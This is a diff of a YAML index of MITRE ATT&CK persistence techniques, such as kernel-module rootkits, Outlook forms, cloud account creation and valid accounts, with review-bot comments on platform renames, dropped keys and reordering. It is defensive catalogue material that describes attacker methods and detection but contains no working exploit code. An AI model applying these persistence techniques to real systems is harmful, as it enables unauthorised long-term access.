- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
@@ -32631,12 +33059,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.001
atomic_tests: []
T1136.003:
technique:
- modified: '2024-03-28T16:14:28.678Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Create Account: Cloud Account'
description: |-
Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
@@ -32649,9 +33076,11 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Praetorian
- Microsoft Threat Intelligence Center (MSTIC)
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Collect usage logs from cloud user and administrator accounts
to identify unusual activity in the creation of new accounts and assignment
@@ -32660,13 +33089,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- IaaS
- - Google Workspace
- SaaS
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Creation'
type: attack-pattern
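Review bot: `Office 365` and `Google Workspace` are collapsed into a single `Office Suite` platform and `Azure AD` becomes `Identity Provider`, here for T1136.003 and again for T1098 below. Anything that derives per-platform views from this index by matching the old platform strings will silently stop including these techniques; the commit message should call out the rename, and whatever produces the per-platform index files should be checked for the new names before this lands.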
@@ -32714,14 +33143,11 @@ persistence:
url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.003
atomic_tests: []
T1098:
technique:
- modified: '2024-01-16T22:24:38.234Z'
+ modified: '2024-10-15T15:35:57.382Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
@@ -32757,16 +33183,15 @@ persistence:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- SaaS
- Network
- Containers
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -32807,7 +33232,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098
atomic_tests:
- name: GCP - Delete Service Account Key
@@ -32886,138 +33310,137 @@ persistence:
terraform apply -auto-approve
T1547.006:
technique:
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-12T17:30:54.170Z'
+ name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+ description: |-
+ Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
+
+ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+ Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+ Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+ Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: |
+ Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+
+ On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'File: File Creation'
+ - 'File: File Modification'
+ - 'Kernel: Kernel Module Load'
+ - 'Process: Process Creation'
+ x_mitre_permissions_required:
+ - root
type: attack-pattern
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1547.006
url: https://attack.mitre.org/techniques/T1547/006
+ external_id: T1547.006
- source_name: Apple Developer Configuration Profile
- url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
+ url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
- url: https://developer.apple.com/support/kernel-extensions/
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
+ url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
- url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
+ url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
- url: https://github.com/f0rb1dd3n/Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
+ url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
- url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+ url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
- source_name: iDefense Rootkit Overview
- url: http://www.megasecurity.org/papers/Rootkits.pdf
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
- April 6, 2018.
+ September 12, 2024.
+ url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
+ url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
- url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
+ url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
- url: https://github.com/m0nad/Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+ url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
- url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
+ url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
- url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
+ url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
- url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved April 6, 2018.
+ url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
- url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
+ url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: Trend Micro Skidmap
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
- source_name: Purves Kextpocalypse 2
- url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
+ url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
- url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
+ url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
- url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved April 6, 2018.
+ url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
- source_name: Wikipedia Loadable Kernel Module
- url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
-
- When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
- Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
- Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
- Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
- x_mitre_detection: |
- Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
- Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
-
- On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'File: File Creation'
- - 'File: File Modification'
- - 'Kernel: Kernel Module Load'
- - 'Process: Process Creation'
- x_mitre_permissions_required:
- - root
- x_mitre_attack_spec_version: 2.1.0
+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.006
atomic_tests: []
T1574.013:
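Review bot: the T1547.006 object loses its name, description, x_mitre_detection, kill_chain_phases, x_mitre_data_sources and x_mitre_permissions_required in this hunk (the run of `-` lines from `- x_mitre_deprecated: false` down to `- x_mitre_attack_spec_version: 2.1.0`) with no matching `+` lines in view; the only additions are `+ url`, `+ object_marking_refs` and `+ x_mitre_attack_spec_version: 3.2.0`, so please confirm the generator re-emitted the missing keys earlier in the object rather than dropping them. The `url`/`description` swap inside every external_references entry is pure key reordering and is what makes this hunk so long; pinning the key order in the generator would keep future refreshes reviewable.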
@@ -33054,7 +33477,7 @@ persistence:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
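Review bot: the `modified` timestamp for KernelCallbackTable goes backwards here, from '2022-05-11T14:00:00.188Z' to '2022-03-22T15:47:33.915Z', and the same regression appears further down for ROMMONkit, IIS Components, Authentication Package and Component Object Model Hijacking. Every timestamp being replaced ends in 14:00:00.188Z, which reads like a bulk release stamp rather than a per-object edit time, so the change is plausible, but the commit message should state that these objects are being re-synced to the upstream STIX `modified` values so nobody reads the earlier dates as a rollback.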
@@ -33080,12 +33503,10 @@ persistence:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
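Review bot: T1574.013 drops both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` with no replacement `x_mitre_attack_spec_version` line in this hunk, whereas T1547.006 above gets `x_mitre_attack_spec_version: 3.2.0` added; T1542.004 and T1505.004 later in the diff have the same pair removed. If any consumer reads x_mitre_attack_spec_version, check that these three objects still carry it somewhere in their block, or leave the 2.1.0 value in place until they are refreshed from the same bundle as the others.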
@@ -33163,9 +33584,8 @@ persistence:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1542.004:
@@ -33192,7 +33612,7 @@ persistence:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T02:18:19.568Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -33214,41 +33634,10 @@ persistence:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1137.003:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
- type: attack-pattern
- created: '2019-11-07T20:06:02.624Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.003
- url: https://attack.mitre.org/techniques/T1137/003
- - source_name: SensePost Outlook Forms
- url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
- description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
- February 4, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
- - source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
- description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
- provides blue teams with the ability to detect Ruler usage against Exchange.
- Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:02:00.782Z'
name: Outlook Forms
description: |-
Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
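Review bot: the head of the T1137.003 object (x_mitre_platforms, x_mitre_domains, object_marking_refs, id, type, created, created_by_ref and the whole external_references list) is deleted here only to be re-added at the tail of the same object in the next hunk, so the real changes (Office 365 to Office Suite, the new `modified`) are buried under some forty lines of churn; the same pattern repeats for T1546.004 and T1137.004 below. Emitting keys in a stable order from the generator, or sorting keys before writing, would make these refreshes diffable. Note also that T1542.004 in this hunk loses both spec-version keys with nothing replacing them.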
@@ -33257,22 +33646,49 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'Process: Process Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
+ created: '2019-11-07T20:06:02.624Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/003
+ external_id: T1137.003
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SensePost NotRuler
+ description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+ provides blue teams with the ability to detect Ruler usage against Exchange.
+ Retrieved February 4, 2019.
+ url: https://github.com/sensepost/notruler
+ - source_name: SensePost Outlook Forms
+ description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
+ February 4, 2019.
+ url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1574:
technique:
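Review bot: `x_mitre_permissions_required` (Administrator, User) is removed from T1137.003 with nothing replacing it, while T1505.004 and T1546.004 in this same diff keep their permissions_required lists; if the upstream object dropped the field this is correct, but it should be called out in the commit message, and any tooling that filters techniques by required permission needs to tolerate the key being absent. Apart from ordering, the re-added reference entries match the ones removed in the previous hunk.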
@@ -33338,7 +33754,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.005:
technique:
@@ -33412,11 +33827,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -33433,7 +33847,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -33443,7 +33856,7 @@ persistence:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -33452,19 +33865,17 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
